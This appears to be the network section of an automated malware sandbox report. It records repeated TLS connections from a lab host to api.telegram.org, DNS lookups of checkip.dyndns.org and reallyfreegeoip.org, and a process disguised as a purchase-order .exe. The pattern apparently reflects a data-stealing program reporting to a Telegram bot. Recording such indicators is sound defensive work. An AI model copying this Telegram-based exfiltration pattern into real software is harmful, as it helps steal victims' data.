                                                                                                                                            Dec 16, 2024 14:17:34.663868904 CET44350111149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:34.664138079 CET44350111149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:34.666045904 CET50111443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:34.666101933 CET44350111149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:34.666234970 CET44350111149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:34.666268110 CET50111443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:34.666309118 CET50111443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:34.669462919 CET50112443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:34.669504881 CET44350112149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:34.669671059 CET50112443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:34.670001030 CET50112443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:34.670022011 CET44350112149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:36.066791058 CET44350112149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:36.066884041 CET50112443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:36.068837881 CET50112443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:36.068864107 CET44350112149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:36.069099903 CET44350112149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:36.070755005 CET50112443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:36.070789099 CET44350112149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:36.070908070 CET44350112149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:36.070960999 CET50112443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:36.070979118 CET50112443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:36.073919058 CET50113443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:36.073955059 CET44350113149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:36.074037075 CET50113443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:36.074335098 CET50113443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:36.074345112 CET44350113149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:37.447582006 CET44350113149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:37.447666883 CET50113443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:37.449727058 CET50113443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:37.449737072 CET44350113149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:37.449995995 CET44350113149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:37.452640057 CET50113443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:37.452681065 CET44350113149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:37.452809095 CET50113443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:37.457127094 CET50114443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:37.457175970 CET44350114149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:37.457370043 CET50114443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:37.457835913 CET50114443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:37.457847118 CET44350114149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:38.828195095 CET44350114149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:38.828303099 CET50114443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:38.829926014 CET50114443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:38.829943895 CET44350114149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:38.830322981 CET44350114149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:38.832434893 CET50114443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:38.832477093 CET44350114149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:38.832537889 CET50114443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:38.844575882 CET50115443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:38.844619989 CET44350115149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:38.844701052 CET50115443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:38.845016003 CET50115443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:38.845031023 CET44350115149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:40.208570957 CET44350115149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:40.208738089 CET50115443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:40.210872889 CET50115443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:40.210884094 CET44350115149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:40.211184025 CET44350115149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:40.221343994 CET50115443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:40.221436024 CET44350115149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:40.221506119 CET50115443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:40.224351883 CET50116443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:40.224401951 CET44350116149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:40.224488020 CET50116443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:40.225006104 CET50116443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:40.225020885 CET44350116149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:41.598109007 CET44350116149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:41.598200083 CET50116443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:41.600133896 CET50116443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:41.600157976 CET44350116149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:41.600519896 CET44350116149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:41.604582071 CET50116443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:41.604650974 CET44350116149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:41.604738951 CET50116443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:41.607345104 CET50117443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:41.607407093 CET44350117149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:41.607496023 CET50117443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:41.607711077 CET50117443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:41.607728958 CET44350117149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:42.986900091 CET44350117149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:42.987127066 CET50117443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:43.007467031 CET50117443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:43.007543087 CET44350117149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:43.008142948 CET44350117149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:43.010360003 CET50117443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:43.010445118 CET44350117149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:43.010525942 CET50117443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:43.017627001 CET50118443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:43.017698050 CET44350118149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:43.017772913 CET50118443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:43.018009901 CET50118443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:43.018032074 CET44350118149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:44.386876106 CET44350118149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:44.386979103 CET50118443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:44.389218092 CET50118443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:44.389230013 CET44350118149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:44.389488935 CET44350118149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:44.391596079 CET50118443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:44.391638041 CET44350118149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:44.391767025 CET44350118149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:44.391782045 CET50118443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:44.391839981 CET50118443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:44.395901918 CET50119443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:44.395999908 CET44350119149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:44.396106005 CET50119443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:44.396450043 CET50119443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:44.396485090 CET44350119149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:45.769753933 CET44350119149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:45.769876003 CET50119443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:45.784245968 CET50119443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:45.784293890 CET44350119149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:45.784651995 CET44350119149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:45.788170099 CET50119443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:45.788229942 CET44350119149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:45.788290977 CET50119443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:45.827527046 CET50120443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:45.827585936 CET44350120149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:45.827676058 CET50120443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:45.832453966 CET50120443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:45.832474947 CET44350120149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:47.194098949 CET44350120149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:47.194165945 CET50120443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:47.196213961 CET50120443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:47.196228981 CET44350120149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:47.196489096 CET44350120149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:47.396503925 CET50120443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:49.073595047 CET50120443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:49.073698044 CET44350120149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:49.073810101 CET50120443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:49.076523066 CET50122443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:49.076555014 CET44350122149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:49.076667070 CET50122443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:49.077095985 CET50122443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:49.077106953 CET44350122149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:50.440139055 CET44350122149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:50.440222979 CET50122443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:50.444866896 CET50122443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:50.444879055 CET44350122149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:50.445183992 CET44350122149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:50.489154100 CET50122443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:52.194067001 CET50122443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:52.194173098 CET44350122149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:52.194329023 CET50122443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:52.197108030 CET50124443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:52.197146893 CET44350124149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:52.197228909 CET50124443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:52.197501898 CET50124443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:52.197515965 CET44350124149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:53.563323975 CET44350124149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:53.563400984 CET50124443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:53.565505028 CET50124443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:53.565516949 CET44350124149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:53.565751076 CET44350124149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:53.674685955 CET50124443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:55.301378965 CET50124443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:55.301491022 CET44350124149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:55.301558018 CET50124443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:55.304373026 CET50126443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:55.304397106 CET44350126149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:55.304512024 CET50126443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:55.304773092 CET50126443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:55.304783106 CET44350126149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:56.670922041 CET44350126149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:56.671036005 CET50126443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:56.673376083 CET50126443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:56.673389912 CET44350126149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:56.673635960 CET44350126149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:56.879381895 CET44350126149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:56.880786896 CET50126443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:58.443870068 CET50126443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:58.443981886 CET44350126149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:58.444047928 CET50126443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:58.446753025 CET50128443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:58.446799994 CET44350128149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:58.446885109 CET50128443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:58.447336912 CET50128443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:58.447345972 CET44350128149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:59.819252014 CET44350128149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:59.819329977 CET50128443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:59.820940018 CET50128443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:17:59.820951939 CET44350128149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:59.821295023 CET44350128149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:17:59.896559000 CET50128443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:01.620635986 CET50128443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:01.620845079 CET44350128149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:01.620929003 CET50128443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:01.623524904 CET50130443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:01.623578072 CET44350130149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:01.623657942 CET50130443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:01.623931885 CET50130443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:01.623946905 CET44350130149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:02.998064041 CET44350130149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:02.998471975 CET50130443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:03.005927086 CET50130443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:03.005949020 CET44350130149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:03.006191015 CET44350130149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:03.209048033 CET50130443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:05.049650908 CET50130443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:05.049765110 CET44350130149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:05.049834967 CET50130443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:05.053416014 CET50132443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:05.053477049 CET44350132149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:05.053543091 CET50132443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:05.053828955 CET50132443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:05.053843975 CET44350132149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:06.421225071 CET44350132149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:06.421314955 CET50132443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:06.428823948 CET50132443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:06.428863049 CET44350132149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:06.429125071 CET44350132149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:06.505899906 CET50132443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:08.177442074 CET50132443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:08.177592039 CET44350132149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:08.177670002 CET50132443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:08.180480003 CET50134443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:08.180540085 CET44350134149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:08.180613995 CET50134443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:08.180963993 CET50134443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:08.180990934 CET44350134149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:09.541649103 CET44350134149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:09.541718006 CET50134443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:09.544414997 CET50134443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:09.544430971 CET44350134149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:09.544672012 CET44350134149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:09.693411112 CET50134443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:12.220194101 CET50134443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:12.220307112 CET44350134149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:12.220374107 CET50134443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:12.223721027 CET50136443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:12.223798990 CET44350136149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:12.223885059 CET50136443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:12.224189997 CET50136443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:12.224221945 CET44350136149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:13.599095106 CET44350136149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:13.599236965 CET50136443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:14.530597925 CET50136443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:14.530662060 CET44350136149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:14.531029940 CET44350136149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:14.539136887 CET50136443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:14.579339027 CET44350136149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:14.579407930 CET50136443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:14.579425097 CET44350136149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:15.114219904 CET44350136149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:15.114315987 CET44350136149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:15.114365101 CET50136443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:15.114870071 CET50136443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:15.116461992 CET50137443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:15.116574049 CET44350137149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:15.116651058 CET50137443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:15.116980076 CET50137443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:15.117016077 CET44350137149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:16.497036934 CET44350137149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:16.498904943 CET50137443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:16.498920918 CET44350137149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:16.498994112 CET50137443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:18:16.498997927 CET44350137149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:17.038883924 CET44350137149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:17.039086103 CET44350137149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:18:17.039149046 CET50137443192.168.2.4149.154.167.220
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 16, 2024 14:14:12.388133049 CET5016453192.168.2.41.1.1.1
                                                                                                                                            Dec 16, 2024 14:14:12.527997971 CET53501641.1.1.1192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:15.052660942 CET5179453192.168.2.41.1.1.1
                                                                                                                                            Dec 16, 2024 14:14:15.196254015 CET53517941.1.1.1192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:44.409224987 CET5292253192.168.2.41.1.1.1
                                                                                                                                            Dec 16, 2024 14:14:44.547364950 CET53529221.1.1.1192.168.2.4
                                                                                                                                            Dec 16, 2024 14:16:34.824105978 CET6511153192.168.2.41.1.1.1
                                                                                                                                            Dec 16, 2024 14:16:34.962364912 CET53651111.1.1.1192.168.2.4
                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Dec 16, 2024 14:14:12.388133049 CET192.168.2.41.1.1.10xe0fcStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:15.052660942 CET192.168.2.41.1.1.10xd786Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:44.409224987 CET192.168.2.41.1.1.10x27eeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:16:34.824105978 CET192.168.2.41.1.1.10x523dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Dec 16, 2024 14:14:12.527997971 CET1.1.1.1192.168.2.40xe0fcNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:12.527997971 CET1.1.1.1192.168.2.40xe0fcNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:12.527997971 CET1.1.1.1192.168.2.40xe0fcNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:12.527997971 CET1.1.1.1192.168.2.40xe0fcNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:12.527997971 CET1.1.1.1192.168.2.40xe0fcNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:12.527997971 CET1.1.1.1192.168.2.40xe0fcNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:15.196254015 CET1.1.1.1192.168.2.40xd786No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:15.196254015 CET1.1.1.1192.168.2.40xd786No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:25.486550093 CET1.1.1.1192.168.2.40x18bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:25.486550093 CET1.1.1.1192.168.2.40x18bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:14:44.547364950 CET1.1.1.1192.168.2.40x27eeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:16:34.962364912 CET1.1.1.1192.168.2.40x523dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:17:47.384787083 CET1.1.1.1192.168.2.40x9815No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                            Dec 16, 2024 14:17:47.384787083 CET1.1.1.1192.168.2.40x9815No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                            • reallyfreegeoip.org
                                                                                                                                            • api.telegram.org
                                                                                                                                            • checkip.dyndns.org
                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.449734132.226.8.169807340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
